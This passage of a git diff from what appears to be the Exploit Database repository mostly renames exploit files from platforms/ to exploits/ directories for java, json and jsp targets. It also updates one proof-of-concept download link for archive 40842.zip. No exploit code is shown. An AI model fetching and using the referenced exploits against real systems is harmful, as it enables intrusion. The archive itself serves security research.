Mediaservice.net Srl. All rights reserved. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40842.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40842.zip \ No newline at end of file diff --git a/platforms/java/webapps/41014.txt b/exploits/java/webapps/41014.txt similarity index 100% rename from platforms/java/webapps/41014.txt rename to exploits/java/webapps/41014.txt diff --git a/platforms/java/webapps/41082.txt b/exploits/java/webapps/41082.txt similarity index 100% rename from platforms/java/webapps/41082.txt rename to exploits/java/webapps/41082.txt diff --git a/platforms/java/webapps/41466.py b/exploits/java/webapps/41466.py similarity index 100% rename from platforms/java/webapps/41466.py rename to exploits/java/webapps/41466.py diff --git a/platforms/java/webapps/41958.py b/exploits/java/webapps/41958.py similarity index 100% rename from platforms/java/webapps/41958.py rename to exploits/java/webapps/41958.py diff --git a/platforms/java/webapps/41960.py b/exploits/java/webapps/41960.py similarity index 100% rename from platforms/java/webapps/41960.py rename to exploits/java/webapps/41960.py diff --git a/platforms/java/webapps/42034.txt b/exploits/java/webapps/42034.txt similarity index 100% rename from platforms/java/webapps/42034.txt rename to exploits/java/webapps/42034.txt diff --git a/platforms/java/webapps/42037.txt b/exploits/java/webapps/42037.txt similarity index 100% rename from platforms/java/webapps/42037.txt rename to exploits/java/webapps/42037.txt diff --git a/platforms/java/webapps/42358.rb b/exploits/java/webapps/42358.rb similarity index 100% rename from platforms/java/webapps/42358.rb rename to exploits/java/webapps/42358.rb diff --git a/platforms/java/webapps/42543.txt b/exploits/java/webapps/42543.txt similarity index 100% rename from platforms/java/webapps/42543.txt rename to exploits/java/webapps/42543.txt diff --git a/platforms/java/webapps/42544.py b/exploits/java/webapps/42544.py similarity index 100% rename from platforms/java/webapps/42544.py rename to exploits/java/webapps/42544.py diff --git a/platforms/java/webapps/43114.py b/exploits/java/webapps/43114.py similarity index 100% rename from platforms/java/webapps/43114.py rename to exploits/java/webapps/43114.py diff --git a/platforms/json/webapps/39488.txt b/exploits/json/webapps/39488.txt similarity index 100% rename from platforms/json/webapps/39488.txt rename to exploits/json/webapps/39488.txt diff --git a/platforms/json/webapps/40030.py b/exploits/json/webapps/40030.py similarity index 100% rename from platforms/json/webapps/40030.py rename to exploits/json/webapps/40030.py diff --git a/platforms/json/webapps/41541.html b/exploits/json/webapps/41541.html similarity index 100% rename from platforms/json/webapps/41541.html rename to exploits/json/webapps/41541.html diff --git a/platforms/json/webapps/42111.txt b/exploits/json/webapps/42111.txt similarity index 100% rename from platforms/json/webapps/42111.txt rename to exploits/json/webapps/42111.txt diff --git a/platforms/json/webapps/42332.rb b/exploits/json/webapps/42332.rb similarity index 100% rename from platforms/json/webapps/42332.rb rename to exploits/json/webapps/42332.rb diff --git a/platforms/json/webapps/42371.txt b/exploits/json/webapps/42371.txt similarity index 100% rename from platforms/json/webapps/42371.txt rename to exploits/json/webapps/42371.txt diff --git a/platforms/json/webapps/42372.txt b/exploits/json/webapps/42372.txt similarity index 100% rename from platforms/json/webapps/42372.txt rename to exploits/json/webapps/42372.txt diff --git a/platforms/json/webapps/42579.txt b/exploits/json/webapps/42579.txt similarity index 100% rename from platforms/json/webapps/42579.txt rename to exploits/json/webapps/42579.txt diff --git a/platforms/json/webapps/42580.html b/exploits/json/webapps/42580.html similarity index 100% rename from platforms/json/webapps/42580.html rename to exploits/json/webapps/42580.html diff --git a/platforms/jsp/dos/37218.txt b/exploits/jsp/dos/37218.txt similarity index 100% rename from platforms/jsp/dos/37218.txt rename to exploits/jsp/dos/37218.txt diff --git a/platforms/jsp/remote/18179.html b/exploits/jsp/remote/18179.html similarity index 100% rename from platforms/jsp/remote/18179.html rename to exploits/jsp/remote/18179.html diff --git a/platforms/jsp/remote/20412.txt b/exploits/jsp/remote/20412.txt similarity index 100% rename from platforms/jsp/remote/20412.txt rename to exploits/jsp/remote/20412.txt diff --git a/platforms/jsp/remote/20429.txt b/exploits/jsp/remote/20429.txt similarity index 100% rename from platforms/jsp/remote/20429.txt rename to exploits/jsp/remote/20429.txt diff --git a/platforms/jsp/remote/20592.txt b/exploits/jsp/remote/20592.txt similarity index 100% rename from platforms/jsp/remote/20592.txt rename to exploits/jsp/remote/20592.txt diff --git a/platforms/jsp/remote/21355.txt b/exploits/jsp/remote/21355.txt similarity index 100% rename from platforms/jsp/remote/21355.txt rename to exploits/jsp/remote/21355.txt diff --git a/platforms/jsp/remote/31253.rb b/exploits/jsp/remote/31253.rb similarity index 100% rename from platforms/jsp/remote/31253.rb rename to exploits/jsp/remote/31253.rb diff --git a/platforms/jsp/remote/36653.rb b/exploits/jsp/remote/36653.rb similarity index 100% rename from platforms/jsp/remote/36653.rb rename to exploits/jsp/remote/36653.rb diff --git a/platforms/jsp/remote/38982.rb b/exploits/jsp/remote/38982.rb similarity index 100% rename from platforms/jsp/remote/38982.rb rename to exploits/jsp/remote/38982.rb diff --git a/platforms/jsp/remote/39439.txt b/exploits/jsp/remote/39439.txt similarity index 100% rename from platforms/jsp/remote/39439.txt rename to exploits/jsp/remote/39439.txt diff --git a/platforms/jsp/remote/42698.rb b/exploits/jsp/remote/42698.rb similarity index 100% rename from platforms/jsp/remote/42698.rb rename to exploits/jsp/remote/42698.rb diff --git a/platforms/jsp/webapps/10013.txt b/exploits/jsp/webapps/10013.txt similarity index 100% rename from platforms/jsp/webapps/10013.txt rename to exploits/jsp/webapps/10013.txt diff --git a/platforms/jsp/webapps/10059.txt b/exploits/jsp/webapps/10059.txt similarity index 100% rename from platforms/jsp/webapps/10059.txt rename to exploits/jsp/webapps/10059.txt diff --git a/platforms/jsp/webapps/10061.txt b/exploits/jsp/webapps/10061.txt similarity index 100% rename from platforms/jsp/webapps/10061.txt rename to exploits/jsp/webapps/10061.txt diff --git a/platforms/jsp/webapps/10085.txt b/exploits/jsp/webapps/10085.txt similarity index 100% rename from platforms/jsp/webapps/10085.txt rename to exploits/jsp/webapps/10085.txt diff --git a/platforms/jsp/webapps/10094.txt b/exploits/jsp/webapps/10094.txt similarity index 100% rename from platforms/jsp/webapps/10094.txt rename to exploits/jsp/webapps/10094.txt diff --git a/platforms/jsp/webapps/11324.txt b/exploits/jsp/webapps/11324.txt similarity index 100% rename from platforms/jsp/webapps/11324.txt rename to exploits/jsp/webapps/11324.txt diff --git a/platforms/jsp/webapps/11393.txt b/exploits/jsp/webapps/11393.txt similarity index 100% rename from platforms/jsp/webapps/11393.txt rename to exploits/jsp/webapps/11393.txt diff --git a/platforms/jsp/webapps/11793.txt b/exploits/jsp/webapps/11793.txt similarity index 100% rename from platforms/jsp/webapps/11793.txt rename to exploits/jsp/webapps/11793.txt diff --git a/platforms/jsp/webapps/12242.txt b/exploits/jsp/webapps/12242.txt similarity index 100% rename from platforms/jsp/webapps/12242.txt rename to exploits/jsp/webapps/12242.txt diff --git a/platforms/jsp/webapps/14369.txt b/exploits/jsp/webapps/14369.txt similarity index 100% rename from platforms/jsp/webapps/14369.txt rename to exploits/jsp/webapps/14369.txt diff --git a/platforms/jsp/webapps/14617.txt b/exploits/jsp/webapps/14617.txt similarity index 100% rename from platforms/jsp/webapps/14617.txt rename to exploits/jsp/webapps/14617.txt diff --git a/platforms/jsp/webapps/15290.txt b/exploits/jsp/webapps/15290.txt similarity index 100% rename from platforms/jsp/webapps/15290.txt rename to exploits/jsp/webapps/15290.txt diff --git a/platforms/jsp/webapps/15596.txt b/exploits/jsp/webapps/15596.txt similarity index 100% rename from platforms/jsp/webapps/15596.txt rename to exploits/jsp/webapps/15596.txt diff --git a/platforms/jsp/webapps/15918.txt b/exploits/jsp/webapps/15918.txt similarity index 100% rename from platforms/jsp/webapps/15918.txt rename to exploits/jsp/webapps/15918.txt diff --git a/platforms/jsp/webapps/15997.py b/exploits/jsp/webapps/15997.py similarity index 100% rename from platforms/jsp/webapps/15997.py rename to exploits/jsp/webapps/15997.py diff --git a/platforms/jsp/webapps/16157.py b/exploits/jsp/webapps/16157.py similarity index 100% rename from platforms/jsp/webapps/16157.py rename to exploits/jsp/webapps/16157.py diff --git a/platforms/jsp/webapps/16274.pl b/exploits/jsp/webapps/16274.pl similarity index 100% rename from platforms/jsp/webapps/16274.pl rename to exploits/jsp/webapps/16274.pl diff --git a/platforms/jsp/webapps/17437.txt b/exploits/jsp/webapps/17437.txt similarity index 100% rename from platforms/jsp/webapps/17437.txt rename to exploits/jsp/webapps/17437.txt diff --git a/platforms/jsp/webapps/17442.txt b/exploits/jsp/webapps/17442.txt similarity index 100% rename from platforms/jsp/webapps/17442.txt rename to exploits/jsp/webapps/17442.txt diff --git a/platforms/jsp/webapps/17503.pl b/exploits/jsp/webapps/17503.pl similarity index 100% rename from platforms/jsp/webapps/17503.pl rename to exploits/jsp/webapps/17503.pl diff --git a/platforms/jsp/webapps/17551.txt b/exploits/jsp/webapps/17551.txt similarity index 100% rename from platforms/jsp/webapps/17551.txt rename to exploits/jsp/webapps/17551.txt diff --git a/platforms/jsp/webapps/17574.php b/exploits/jsp/webapps/17574.php similarity index 100% rename from platforms/jsp/webapps/17574.php rename to exploits/jsp/webapps/17574.php diff --git a/platforms/jsp/webapps/17586.txt b/exploits/jsp/webapps/17586.txt similarity index 100% rename from platforms/jsp/webapps/17586.txt rename to exploits/jsp/webapps/17586.txt diff --git a/platforms/jsp/webapps/17594.rb b/exploits/jsp/webapps/17594.rb similarity index 100% rename from platforms/jsp/webapps/17594.rb rename to exploits/jsp/webapps/17594.rb diff --git a/platforms/jsp/webapps/17615.rb b/exploits/jsp/webapps/17615.rb similarity index 100% rename from platforms/jsp/webapps/17615.rb rename to exploits/jsp/webapps/17615.rb diff --git a/platforms/jsp/webapps/17713.txt b/exploits/jsp/webapps/17713.txt similarity index 100% rename from platforms/jsp/webapps/17713.txt rename to exploits/jsp/webapps/17713.txt diff --git a/platforms/jsp/webapps/17846.php b/exploits/jsp/webapps/17846.php similarity index 100% rename from platforms/jsp/webapps/17846.php rename to exploits/jsp/webapps/17846.php diff --git a/platforms/jsp/webapps/17897.txt b/exploits/jsp/webapps/17897.txt similarity index 100% rename from platforms/jsp/webapps/17897.txt rename to exploits/jsp/webapps/17897.txt diff --git a/platforms/jsp/webapps/17924.pl b/exploits/jsp/webapps/17924.pl similarity index 100% rename from platforms/jsp/webapps/17924.pl rename to exploits/jsp/webapps/17924.pl diff --git a/platforms/jsp/webapps/18260.txt b/exploits/jsp/webapps/18260.txt similarity index 100% rename from platforms/jsp/webapps/18260.txt rename to exploits/jsp/webapps/18260.txt diff --git a/platforms/jsp/webapps/18373.txt b/exploits/jsp/webapps/18373.txt similarity index 100% rename from platforms/jsp/webapps/18373.txt rename to exploits/jsp/webapps/18373.txt diff --git a/platforms/jsp/webapps/18416.txt b/exploits/jsp/webapps/18416.txt similarity index 100% rename from platforms/jsp/webapps/18416.txt rename to exploits/jsp/webapps/18416.txt diff --git a/platforms/jsp/webapps/18626.txt b/exploits/jsp/webapps/18626.txt similarity index 100% rename from platforms/jsp/webapps/18626.txt rename to exploits/jsp/webapps/18626.txt diff --git a/platforms/jsp/webapps/18888.txt b/exploits/jsp/webapps/18888.txt similarity index 100% rename from platforms/jsp/webapps/18888.txt rename to exploits/jsp/webapps/18888.txt diff --git a/platforms/jsp/webapps/19432.rb b/exploits/jsp/webapps/19432.rb similarity index 100% rename from platforms/jsp/webapps/19432.rb rename to exploits/jsp/webapps/19432.rb diff --git a/platforms/jsp/webapps/21052.txt b/exploits/jsp/webapps/21052.txt similarity index 100% rename from platforms/jsp/webapps/21052.txt rename to exploits/jsp/webapps/21052.txt diff --git a/platforms/jsp/webapps/21545.txt b/exploits/jsp/webapps/21545.txt similarity index 100% rename from platforms/jsp/webapps/21545.txt rename to exploits/jsp/webapps/21545.txt diff --git a/platforms/jsp/webapps/21621.txt b/exploits/jsp/webapps/21621.txt similarity index 100% rename from platforms/jsp/webapps/21621.txt rename to exploits/jsp/webapps/21621.txt diff --git a/platforms/jsp/webapps/21875.txt b/exploits/jsp/webapps/21875.txt similarity index 100% rename from platforms/jsp/webapps/21875.txt rename to exploits/jsp/webapps/21875.txt diff --git a/platforms/jsp/webapps/22040.txt b/exploits/jsp/webapps/22040.txt similarity index 100% rename from platforms/jsp/webapps/22040.txt rename to exploits/jsp/webapps/22040.txt diff --git a/platforms/jsp/webapps/22805.txt b/exploits/jsp/webapps/22805.txt similarity index 100% rename from platforms/jsp/webapps/22805.txt rename to exploits/jsp/webapps/22805.txt diff --git a/platforms/jsp/webapps/22849.txt b/exploits/jsp/webapps/22849.txt similarity index 100% rename from platforms/jsp/webapps/22849.txt rename to exploits/jsp/webapps/22849.txt diff --git a/platforms/jsp/webapps/22857.txt b/exploits/jsp/webapps/22857.txt similarity index 100% rename from platforms/jsp/webapps/22857.txt rename to exploits/jsp/webapps/22857.txt diff --git a/platforms/jsp/webapps/23262.txt b/exploits/jsp/webapps/23262.txt similarity index 100% rename from platforms/jsp/webapps/23262.txt rename to exploits/jsp/webapps/23262.txt diff --git a/platforms/jsp/webapps/23315.txt b/exploits/jsp/webapps/23315.txt similarity index 100% rename from platforms/jsp/webapps/23315.txt rename to exploits/jsp/webapps/23315.txt diff --git a/platforms/jsp/webapps/23402.txt b/exploits/jsp/webapps/23402.txt similarity index 100% rename from platforms/jsp/webapps/23402.txt rename to exploits/jsp/webapps/23402.txt diff --git a/platforms/jsp/webapps/23872.txt b/exploits/jsp/webapps/23872.txt similarity index 100% rename from platforms/jsp/webapps/23872.txt rename to exploits/jsp/webapps/23872.txt diff --git a/platforms/jsp/webapps/24139.txt b/exploits/jsp/webapps/24139.txt similarity index 100% rename from platforms/jsp/webapps/24139.txt rename to exploits/jsp/webapps/24139.txt diff --git a/platforms/jsp/webapps/24158.txt b/exploits/jsp/webapps/24158.txt similarity index 100% rename from platforms/jsp/webapps/24158.txt rename to exploits/jsp/webapps/24158.txt diff --git a/platforms/jsp/webapps/24449.txt b/exploits/jsp/webapps/24449.txt similarity index 100% rename from platforms/jsp/webapps/24449.txt rename to exploits/jsp/webapps/24449.txt diff --git a/platforms/jsp/webapps/24773.txt b/exploits/jsp/webapps/24773.txt similarity index 100% rename from platforms/jsp/webapps/24773.txt rename to exploits/jsp/webapps/24773.txt diff --git a/platforms/jsp/webapps/24786.txt b/exploits/jsp/webapps/24786.txt similarity index 100% rename from platforms/jsp/webapps/24786.txt rename to exploits/jsp/webapps/24786.txt diff --git a/platforms/jsp/webapps/25159.txt b/exploits/jsp/webapps/25159.txt similarity index 100% rename from platforms/jsp/webapps/25159.txt rename to exploits/jsp/webapps/25159.txt diff --git a/platforms/jsp/webapps/25198.txt b/exploits/jsp/webapps/25198.txt similarity index 100% rename from platforms/jsp/webapps/25198.txt rename to exploits/jsp/webapps/25198.txt diff --git a/platforms/jsp/webapps/25269.txt b/exploits/jsp/webapps/25269.txt similarity index 100% rename from platforms/jsp/webapps/25269.txt rename to exploits/jsp/webapps/25269.txt diff --git a/platforms/jsp/webapps/25628.txt b/exploits/jsp/webapps/25628.txt similarity index 100% rename from platforms/jsp/webapps/25628.txt rename to exploits/jsp/webapps/25628.txt diff --git a/platforms/jsp/webapps/25685.txt b/exploits/jsp/webapps/25685.txt similarity index 100% rename from platforms/jsp/webapps/25685.txt rename to exploits/jsp/webapps/25685.txt diff --git a/platforms/jsp/webapps/25738.txt b/exploits/jsp/webapps/25738.txt similarity index 100% rename from platforms/jsp/webapps/25738.txt rename to exploits/jsp/webapps/25738.txt diff --git a/platforms/jsp/webapps/25739.txt b/exploits/jsp/webapps/25739.txt similarity index 100% rename from platforms/jsp/webapps/25739.txt rename to exploits/jsp/webapps/25739.txt diff --git a/platforms/jsp/webapps/25946.txt b/exploits/jsp/webapps/25946.txt similarity index 100% rename from platforms/jsp/webapps/25946.txt rename to exploits/jsp/webapps/25946.txt diff --git a/platforms/jsp/webapps/25977.txt b/exploits/jsp/webapps/25977.txt similarity index 100% rename from platforms/jsp/webapps/25977.txt rename to exploits/jsp/webapps/25977.txt diff --git a/platforms/jsp/webapps/26073.txt b/exploits/jsp/webapps/26073.txt similarity index 100% rename from platforms/jsp/webapps/26073.txt rename to exploits/jsp/webapps/26073.txt diff --git a/platforms/jsp/webapps/26354.txt b/exploits/jsp/webapps/26354.txt similarity index 100% rename from platforms/jsp/webapps/26354.txt rename to exploits/jsp/webapps/26354.txt diff --git a/platforms/jsp/webapps/26532.txt b/exploits/jsp/webapps/26532.txt similarity index 100% rename from platforms/jsp/webapps/26532.txt rename to exploits/jsp/webapps/26532.txt diff --git a/platforms/jsp/webapps/26533.txt b/exploits/jsp/webapps/26533.txt similarity index 100% rename from platforms/jsp/webapps/26533.txt rename to exploits/jsp/webapps/26533.txt diff --git a/platforms/jsp/webapps/26534.txt b/exploits/jsp/webapps/26534.txt similarity index 100% rename from platforms/jsp/webapps/26534.txt rename to exploits/jsp/webapps/26534.txt diff --git a/platforms/jsp/webapps/26700.txt b/exploits/jsp/webapps/26700.txt similarity index 100% rename from platforms/jsp/webapps/26700.txt rename to exploits/jsp/webapps/26700.txt diff --git a/platforms/jsp/webapps/26778.txt b/exploits/jsp/webapps/26778.txt similarity index 100% rename from platforms/jsp/webapps/26778.txt rename to exploits/jsp/webapps/26778.txt diff --git a/platforms/jsp/webapps/26924.txt b/exploits/jsp/webapps/26924.txt similarity index 100% rename from platforms/jsp/webapps/26924.txt rename to exploits/jsp/webapps/26924.txt diff --git a/platforms/jsp/webapps/26972.txt b/exploits/jsp/webapps/26972.txt similarity index 100% rename from platforms/jsp/webapps/26972.txt rename to exploits/jsp/webapps/26972.txt diff --git a/platforms/jsp/webapps/27011.txt b/exploits/jsp/webapps/27011.txt similarity index 100% rename from platforms/jsp/webapps/27011.txt rename to exploits/jsp/webapps/27011.txt diff --git a/platforms/jsp/webapps/27187.py b/exploits/jsp/webapps/27187.py similarity index 100% rename from platforms/jsp/webapps/27187.py rename to exploits/jsp/webapps/27187.py diff --git a/platforms/jsp/webapps/27463.txt b/exploits/jsp/webapps/27463.txt similarity index 100% rename from platforms/jsp/webapps/27463.txt rename to exploits/jsp/webapps/27463.txt diff --git a/platforms/jsp/webapps/27558.txt b/exploits/jsp/webapps/27558.txt similarity index 100% rename from platforms/jsp/webapps/27558.txt rename to exploits/jsp/webapps/27558.txt diff --git a/platforms/jsp/webapps/27559.txt b/exploits/jsp/webapps/27559.txt similarity index 100% rename from platforms/jsp/webapps/27559.txt rename to exploits/jsp/webapps/27559.txt diff --git a/platforms/jsp/webapps/27684.txt b/exploits/jsp/webapps/27684.txt similarity index 100% rename from platforms/jsp/webapps/27684.txt rename to exploits/jsp/webapps/27684.txt diff --git a/platforms/jsp/webapps/28278.txt b/exploits/jsp/webapps/28278.txt similarity index 100% rename from platforms/jsp/webapps/28278.txt rename to exploits/jsp/webapps/28278.txt diff --git a/platforms/jsp/webapps/28605.txt b/exploits/jsp/webapps/28605.txt similarity index 100% rename from platforms/jsp/webapps/28605.txt rename to exploits/jsp/webapps/28605.txt diff --git a/platforms/jsp/webapps/28606.txt b/exploits/jsp/webapps/28606.txt similarity index 100% rename from platforms/jsp/webapps/28606.txt rename to exploits/jsp/webapps/28606.txt diff --git a/platforms/jsp/webapps/28607.txt b/exploits/jsp/webapps/28607.txt similarity index 100% rename from platforms/jsp/webapps/28607.txt rename to exploits/jsp/webapps/28607.txt diff --git a/platforms/jsp/webapps/28608.txt b/exploits/jsp/webapps/28608.txt similarity index 100% rename from platforms/jsp/webapps/28608.txt rename to exploits/jsp/webapps/28608.txt diff --git a/platforms/jsp/webapps/28609.txt b/exploits/jsp/webapps/28609.txt similarity index 100% rename from platforms/jsp/webapps/28609.txt rename to exploits/jsp/webapps/28609.txt diff --git a/platforms/jsp/webapps/28610.txt b/exploits/jsp/webapps/28610.txt similarity index 100% rename from platforms/jsp/webapps/28610.txt rename to exploits/jsp/webapps/28610.txt diff --git a/platforms/jsp/webapps/29301.txt b/exploits/jsp/webapps/29301.txt similarity index 100% rename from platforms/jsp/webapps/29301.txt rename to exploits/jsp/webapps/29301.txt diff --git a/platforms/jsp/webapps/29576.txt b/exploits/jsp/webapps/29576.txt similarity index 100% rename from platforms/jsp/webapps/29576.txt rename to exploits/jsp/webapps/29576.txt diff --git a/platforms/jsp/webapps/29674.txt b/exploits/jsp/webapps/29674.txt similarity index 100% rename from platforms/jsp/webapps/29674.txt rename to exploits/jsp/webapps/29674.txt diff --git a/platforms/jsp/webapps/29811.txt b/exploits/jsp/webapps/29811.txt similarity index 100% rename from platforms/jsp/webapps/29811.txt rename to exploits/jsp/webapps/29811.txt diff --git a/platforms/jsp/webapps/30054.txt b/exploits/jsp/webapps/30054.txt similarity index 100% rename from platforms/jsp/webapps/30054.txt rename to exploits/jsp/webapps/30054.txt diff --git a/platforms/jsp/webapps/30189.txt b/exploits/jsp/webapps/30189.txt similarity index 100% rename from platforms/jsp/webapps/30189.txt rename to exploits/jsp/webapps/30189.txt diff --git a/platforms/jsp/webapps/30191.txt b/exploits/jsp/webapps/30191.txt similarity index 100% rename from platforms/jsp/webapps/30191.txt rename to exploits/jsp/webapps/30191.txt diff --git a/platforms/jsp/webapps/30266.txt b/exploits/jsp/webapps/30266.txt similarity index 100% rename from platforms/jsp/webapps/30266.txt rename to exploits/jsp/webapps/30266.txt diff --git a/platforms/jsp/webapps/30267.txt b/exploits/jsp/webapps/30267.txt similarity index 100% rename from platforms/jsp/webapps/30267.txt rename to exploits/jsp/webapps/30267.txt diff --git a/platforms/jsp/webapps/30268.txt b/exploits/jsp/webapps/30268.txt similarity index 100% rename from platforms/jsp/webapps/30268.txt rename to exploits/jsp/webapps/30268.txt diff --git a/platforms/jsp/webapps/30269.txt b/exploits/jsp/webapps/30269.txt similarity index 100% rename from platforms/jsp/webapps/30269.txt rename to exploits/jsp/webapps/30269.txt diff --git a/platforms/jsp/webapps/30270.txt b/exploits/jsp/webapps/30270.txt similarity index 100% rename from platforms/jsp/webapps/30270.txt rename to exploits/jsp/webapps/30270.txt diff --git a/platforms/jsp/webapps/30563.txt b/exploits/jsp/webapps/30563.txt similarity index 100% rename from platforms/jsp/webapps/30563.txt rename to exploits/jsp/webapps/30563.txt diff --git a/platforms/jsp/webapps/30608.txt b/exploits/jsp/webapps/30608.txt similarity index 100% rename from platforms/jsp/webapps/30608.txt rename to exploits/jsp/webapps/30608.txt diff --git a/platforms/jsp/webapps/30609.txt b/exploits/jsp/webapps/30609.txt similarity index 100% rename from platforms/jsp/webapps/30609.txt rename to exploits/jsp/webapps/30609.txt diff --git a/platforms/jsp/webapps/30610.txt b/exploits/jsp/webapps/30610.txt similarity index 100% rename from platforms/jsp/webapps/30610.txt rename to exploits/jsp/webapps/30610.txt diff --git a/platforms/jsp/webapps/30611.txt b/exploits/jsp/webapps/30611.txt similarity index 100% rename from platforms/jsp/webapps/30611.txt rename to exploits/jsp/webapps/30611.txt diff --git a/platforms/jsp/webapps/30612.txt b/exploits/jsp/webapps/30612.txt similarity index 100% rename from platforms/jsp/webapps/30612.txt rename to exploits/jsp/webapps/30612.txt diff --git a/platforms/jsp/webapps/30613.txt b/exploits/jsp/webapps/30613.txt similarity index 100% rename from platforms/jsp/webapps/30613.txt rename to exploits/jsp/webapps/30613.txt diff --git a/platforms/jsp/webapps/30675.txt b/exploits/jsp/webapps/30675.txt similarity index 100% rename from platforms/jsp/webapps/30675.txt rename to exploits/jsp/webapps/30675.txt diff --git a/platforms/jsp/webapps/30676.txt b/exploits/jsp/webapps/30676.txt similarity index 100% rename from platforms/jsp/webapps/30676.txt rename to exploits/jsp/webapps/30676.txt diff --git a/platforms/jsp/webapps/30704.txt b/exploits/jsp/webapps/30704.txt similarity index 100% rename from platforms/jsp/webapps/30704.txt rename to exploits/jsp/webapps/30704.txt diff --git a/platforms/jsp/webapps/30705.txt b/exploits/jsp/webapps/30705.txt similarity index 100% rename from platforms/jsp/webapps/30705.txt rename to exploits/jsp/webapps/30705.txt diff --git a/platforms/jsp/webapps/31004.txt b/exploits/jsp/webapps/31004.txt similarity index 100% rename from platforms/jsp/webapps/31004.txt rename to exploits/jsp/webapps/31004.txt diff --git a/platforms/jsp/webapps/31005.txt b/exploits/jsp/webapps/31005.txt similarity index 100% rename from platforms/jsp/webapps/31005.txt rename to exploits/jsp/webapps/31005.txt diff --git a/platforms/jsp/webapps/31006.txt b/exploits/jsp/webapps/31006.txt similarity index 100% rename from platforms/jsp/webapps/31006.txt rename to exploits/jsp/webapps/31006.txt diff --git a/platforms/jsp/webapps/31007.txt b/exploits/jsp/webapps/31007.txt similarity index 100% rename from platforms/jsp/webapps/31007.txt rename to exploits/jsp/webapps/31007.txt diff --git a/platforms/jsp/webapps/31299.txt b/exploits/jsp/webapps/31299.txt similarity index 100% rename from platforms/jsp/webapps/31299.txt rename to exploits/jsp/webapps/31299.txt diff --git a/platforms/jsp/webapps/31445.txt b/exploits/jsp/webapps/31445.txt similarity index 100% rename from platforms/jsp/webapps/31445.txt rename to exploits/jsp/webapps/31445.txt diff --git a/platforms/jsp/webapps/31446.txt b/exploits/jsp/webapps/31446.txt similarity index 100% rename from platforms/jsp/webapps/31446.txt rename to exploits/jsp/webapps/31446.txt diff --git a/platforms/jsp/webapps/31475.txt b/exploits/jsp/webapps/31475.txt similarity index 100% rename from platforms/jsp/webapps/31475.txt rename to exploits/jsp/webapps/31475.txt diff --git a/platforms/jsp/webapps/31874.py b/exploits/jsp/webapps/31874.py similarity index 100% rename from platforms/jsp/webapps/31874.py rename to exploits/jsp/webapps/31874.py diff --git a/platforms/jsp/webapps/32046.txt b/exploits/jsp/webapps/32046.txt similarity index 100% rename from platforms/jsp/webapps/32046.txt rename to exploits/jsp/webapps/32046.txt diff --git a/platforms/jsp/webapps/32249.txt b/exploits/jsp/webapps/32249.txt similarity index 100% rename from platforms/jsp/webapps/32249.txt rename to exploits/jsp/webapps/32249.txt diff --git a/platforms/jsp/webapps/32368.txt b/exploits/jsp/webapps/32368.txt similarity index 100% rename from platforms/jsp/webapps/32368.txt rename to exploits/jsp/webapps/32368.txt diff --git a/platforms/jsp/webapps/32423.txt b/exploits/jsp/webapps/32423.txt similarity index 100% rename from platforms/jsp/webapps/32423.txt rename to exploits/jsp/webapps/32423.txt diff --git a/platforms/jsp/webapps/32424.txt b/exploits/jsp/webapps/32424.txt similarity index 100% rename from platforms/jsp/webapps/32424.txt rename to exploits/jsp/webapps/32424.txt diff --git a/platforms/jsp/webapps/32425.txt b/exploits/jsp/webapps/32425.txt similarity index 100% rename from platforms/jsp/webapps/32425.txt rename to exploits/jsp/webapps/32425.txt diff --git a/platforms/jsp/webapps/32579.html b/exploits/jsp/webapps/32579.html similarity index 100% rename from platforms/jsp/webapps/32579.html rename to exploits/jsp/webapps/32579.html diff --git a/platforms/jsp/webapps/32655.txt b/exploits/jsp/webapps/32655.txt similarity index 100% rename from platforms/jsp/webapps/32655.txt rename to exploits/jsp/webapps/32655.txt diff --git a/platforms/jsp/webapps/32677.txt b/exploits/jsp/webapps/32677.txt similarity index 100% rename from platforms/jsp/webapps/32677.txt rename to exploits/jsp/webapps/32677.txt diff --git a/platforms/jsp/webapps/32678.txt b/exploits/jsp/webapps/32678.txt similarity index 100% rename from platforms/jsp/webapps/32678.txt rename to exploits/jsp/webapps/32678.txt diff --git a/platforms/jsp/webapps/32679.txt b/exploits/jsp/webapps/32679.txt similarity index 100% rename from platforms/jsp/webapps/32679.txt rename to exploits/jsp/webapps/32679.txt diff --git a/platforms/jsp/webapps/32680.txt b/exploits/jsp/webapps/32680.txt similarity index 100% rename from platforms/jsp/webapps/32680.txt rename to exploits/jsp/webapps/32680.txt diff --git a/platforms/jsp/webapps/32708.txt b/exploits/jsp/webapps/32708.txt similarity index 100% rename from platforms/jsp/webapps/32708.txt rename to exploits/jsp/webapps/32708.txt diff --git a/platforms/jsp/webapps/32709.txt b/exploits/jsp/webapps/32709.txt similarity index 100% rename from platforms/jsp/webapps/32709.txt rename to exploits/jsp/webapps/32709.txt diff --git a/platforms/jsp/webapps/32710.txt b/exploits/jsp/webapps/32710.txt similarity index 100% rename from platforms/jsp/webapps/32710.txt rename to exploits/jsp/webapps/32710.txt diff --git a/platforms/jsp/webapps/32741.txt b/exploits/jsp/webapps/32741.txt similarity index 100% rename from platforms/jsp/webapps/32741.txt rename to exploits/jsp/webapps/32741.txt diff --git a/platforms/jsp/webapps/32742.txt b/exploits/jsp/webapps/32742.txt similarity index 100% rename from platforms/jsp/webapps/32742.txt rename to exploits/jsp/webapps/32742.txt diff --git a/platforms/jsp/webapps/33209.txt b/exploits/jsp/webapps/33209.txt similarity index 100% rename from platforms/jsp/webapps/33209.txt rename to exploits/jsp/webapps/33209.txt diff --git a/platforms/jsp/webapps/33292.txt b/exploits/jsp/webapps/33292.txt similarity index 100% rename from platforms/jsp/webapps/33292.txt rename to exploits/jsp/webapps/33292.txt diff --git a/platforms/jsp/webapps/33293.txt b/exploits/jsp/webapps/33293.txt similarity index 100% rename from platforms/jsp/webapps/33293.txt rename to exploits/jsp/webapps/33293.txt diff --git a/platforms/jsp/webapps/33346.txt b/exploits/jsp/webapps/33346.txt similarity index 100% rename from platforms/jsp/webapps/33346.txt rename to exploits/jsp/webapps/33346.txt diff --git a/platforms/jsp/webapps/33347.txt b/exploits/jsp/webapps/33347.txt similarity index 100% rename from platforms/jsp/webapps/33347.txt rename to exploits/jsp/webapps/33347.txt diff --git a/platforms/jsp/webapps/33564.txt b/exploits/jsp/webapps/33564.txt similarity index 100% rename from platforms/jsp/webapps/33564.txt rename to exploits/jsp/webapps/33564.txt diff --git a/platforms/jsp/webapps/33596.txt b/exploits/jsp/webapps/33596.txt similarity index 100% rename from platforms/jsp/webapps/33596.txt rename to exploits/jsp/webapps/33596.txt diff --git 